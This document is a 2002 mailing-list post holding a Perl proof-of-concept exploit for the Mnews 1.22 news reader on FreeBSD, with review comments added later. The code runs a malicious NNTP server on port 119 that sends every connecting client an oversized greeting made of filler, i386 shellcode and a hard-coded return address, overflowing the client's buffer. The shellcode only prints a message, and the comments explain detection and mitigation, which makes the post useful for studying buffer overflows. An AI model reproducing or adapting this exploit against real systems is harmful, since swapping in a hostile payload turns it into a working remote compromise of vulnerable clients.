Mnews 1.22 PoC exploit

From: zillion (zillionat_private)
Date: Fri May 31 2002 - 16:37:42 PDT


    #!/usr/bin/perl -w
    #
    # Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped
    # with the 4.5-RELEASE ports collection.
    #
    # This exploit is pretty harmless as it only prints a small message to
    # stdout (NAI?).
    #
    # Written by zillion[at]safemode.org (!shit)
    #
    # http://www.safemode.org
    # http://www.snosoft.com
    #
    # NOTE(review): what the code below actually does. The script never
    # connects anywhere; it listens on TCP port 119 (the NNTP port) and answers
    # every client that connects with a "200 " greeting followed by a 770-byte
    # payload. The vulnerable side is therefore the *client* that reads that
    # greeting (presumably the Mnews reader named above -- not verifiable from
    # this listing) into a buffer that is too small. The payload is: filler,
    # then the shellcode, then two copies of one hard-coded address intended
    # to overwrite the saved return address.
    #
    # Defensive notes:
    #   - Detection: a "200 ..." greeting several hundred bytes long is far
    #     larger than a normal NNTP banner line; a client-side length check on
    #     the first line received, or a network rule on oversized port-119
    #     server greetings, would flag this traffic.
    #   - Mitigation in the client: bound the copy of the server greeting to
    #     the destination buffer size instead of trusting the line length.
    #     The return address below is a stack address (the variable is even
    #     named $esp), so a non-executable stack on the client host defeats
    #     this particular payload as well.
    #   - The address is hard-coded for one FreeBSD 4.5 i386 build; the PoC
    #     is not portable and is only of historical / educational interest.
    #
    # Code-quality notes (code left byte-identical to the original listing):
    #   - no `use strict;` -- $shellcode, $nop, $esp, $off, $size, $buffer,
    #     $i and $cl are all undeclared package globals; only -w is in effect;
    #   - `new IO::Socket::INET (...)` is indirect-object syntax; the usual
    #     form is IO::Socket::INET->new(...);
    #   - the constructor's return value is not checked, so if port 119 cannot
    #     be bound (it is a privileged port) $sock is undef and the later
    #     ->accept() call dies with an unrelated "can't call method" error;
    #   - the `print $cl ...` result is not checked and $cl is never closed
    #     explicitly; each connection is dropped only when $cl is overwritten
    #     by the next accept() (or when the script is killed).
    
    use IO::Socket;
    
    # Raw i386 machine code delivered to the victim (int 0x80 syscalls are
    # visible as \xcd\x80). The bytes from \x23\x57 onward are the ASCII text
    # "#Wassssuppppp !! ???#", i.e. the message the header says gets printed.
    # Judging by the syscall numbers loaded into %al (4, then 1) this looks
    # like write(2) followed by exit(2) on FreeBSD -- TODO confirm, not
    # disassembled here. Total length: 4 x 15 + 1 = 61 bytes.
    $shellcode =
    
            "\xeb\x21\x5e\x31\xc0\x31\xdb\xb3\x3c\x80\xeb\x32\x88\x1e\x88".
            "\x5e\x14\x6a\x15\x56\x6a\x01\xb0\x04\x50\xcd\x80\x31\xc0\x50".
            "\xb0\x01\x50\xcd\x80\xe8\xda\xff\xff\xff\x23\x57\x61\x73\x73".
            "\x73\x73\x75\x70\x70\x70\x70\x70\x20\x21\x21\x20\x3f\x3f\x3f".
            "\x23";
    
    # normal \x90 nops don't work here..
    
    # Filler byte used instead of NOPs (see the author's note above).
    $nop = "A";
    # Hard-coded stack address for the target build; $off is a string literal,
    # but Perl coerces it to -70 when it is added to $esp below.
    $esp = 0xbfbff65e;
    $off = "-70";
    # Size of filler + shellcode; the two packed addresses are appended on top
    # of this, so the final buffer is $size + 8 = 770 bytes.
    $size = 762;
    
    # Pad with $nop until filler + shellcode together are exactly $size bytes
    # (762 - 61 = 701 copies of "A").
    for ($i = 0; $i < ($size - length($shellcode)); $i++) {
        $buffer .= "$nop";
    }
    
    # pack('l', ...) emits the address as a native-byte-order signed 32-bit
    # integer; it is written twice so that either of two adjacent slots on the
    # victim's stack picks it up.
    $buffer .= $shellcode;
    $buffer .= pack('l', ($esp + $off));
    $buffer .= pack('l', ($esp + $off));
    
    # NOTE(review): the format string contains a literal newline (the string
    # spans two source lines), so this banner is printed across two lines.
    # length($buffer) is 770 for the constants above.
    printf("Starting to listen for incoming connections... buffer size
    %d\n",length($buffer));
    print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n");
    
    # Listening TCP socket on port 119. Return value is not checked (see the
    # notes in the header); Reuse => 1 sets SO_REUSEADDR so the script can be
    # restarted without waiting for TIME_WAIT.
    my $sock = new IO::Socket::INET (
                                     LocalPort => 119,
                                     Proto => 'tcp',
                                     Listen => 1,
                                     Reuse => 1,
                                    );
    
    # Serve forever: for each client, wait a second, send the oversized "200"
    # greeting (the NNTP success code followed by the payload), then hold the
    # connection open for three seconds before accepting the next one.
    while($cl = $sock->accept()) {
    
    sleep 1;
    print $cl "200 $buffer\n";
    sleep 3;
    
    }
    


